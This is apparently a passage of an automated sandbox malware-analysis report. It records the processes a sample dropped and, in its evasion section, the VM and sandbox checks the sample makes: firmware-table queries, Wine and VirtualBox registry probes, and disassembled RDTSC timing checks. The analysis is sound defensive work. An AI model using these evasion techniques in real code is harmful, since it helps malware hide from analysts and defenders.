Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114541C second address: 1145423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1145423 second address: 1145429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1145429 second address: 114543C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEDA51D0EB6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114543C second address: 1145459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FEDA531E8D8h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1145459 second address: 1145463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FEDA51D0EB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1145643 second address: 1145649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1145649 second address: 1145655 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11457A7 second address: 11457AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11457AB second address: 11457B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11457B1 second address: 11457B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114592B second address: 114592F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1145BE0 second address: 1145BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1145BED second address: 1145BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1147578 second address: 1147589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEDA531E8CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1147743 second address: 1147748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1147748 second address: 114774D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114774D second address: 1147769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEDA51D0EC1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114789B second address: 11478AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA531E8CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1168AEC second address: 1168AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EBDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1166A4E second address: 1166A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1166BAB second address: 1166BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EC5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1166BC5 second address: 1166BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEDA531E8D8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1166BE3 second address: 1166C1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC5h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEDA51D0EC9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1166C1C second address: 1166C28 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1166FD5 second address: 1166FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11672A1 second address: 11672AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11672AA second address: 11672DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EBAh 0x00000009 jno 00007FEDA51D0EB6h 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FEDA51D0EC6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116741C second address: 116743C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jnl 00007FEDA531E8C6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11679F5 second address: 11679FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11679FB second address: 1167A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1167A00 second address: 1167A08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1167A08 second address: 1167A38 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEDA531E8CDh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FEDA531E8D7h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1167A38 second address: 1167A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116896C second address: 116899C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA531E8D4h 0x00000009 jmp 00007FEDA531E8D3h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116B229 second address: 116B235 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEDA51D0EBEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116B235 second address: 116B241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEDA531E8CEh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1130C52 second address: 1130C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1130C58 second address: 1130C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116C022 second address: 116C028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116C028 second address: 116C02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116C02C second address: 116C05B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FEDA51D0EC3h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116ED61 second address: 116ED6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116ED6B second address: 116ED71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116ED71 second address: 116ED76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116ED76 second address: 116ED88 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEDA51D0EBCh 0x00000008 jns 00007FEDA51D0EB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112D652 second address: 112D66C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEDA531E8CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEDA531E8CAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112D66C second address: 112D670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11767DB second address: 11767FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEDA531E8C6h 0x0000000a push edx 0x0000000b jmp 00007FEDA531E8D4h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1175FF0 second address: 1175FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176277 second address: 117627B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117627B second address: 1176298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EC7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176298 second address: 1176302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jmp 00007FEDA531E8D5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FEDA531E8CBh 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jnc 00007FEDA531E8C6h 0x00000020 jmp 00007FEDA531E8D7h 0x00000025 popad 0x00000026 pushad 0x00000027 jmp 00007FEDA531E8D5h 0x0000002c pushad 0x0000002d popad 0x0000002e push esi 0x0000002f pop esi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11765F2 second address: 1176613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEDA51D0EC5h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176613 second address: 1176617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176617 second address: 117661D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117661D second address: 1176635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1178776 second address: 117877B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117877B second address: 11787A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FEDA531E8C8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11787A6 second address: 11787D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FEDA51D0EC6h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push esi 0x0000000e push eax 0x0000000f jc 00007FEDA51D0EB6h 0x00000015 pop eax 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11787D7 second address: 11787DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
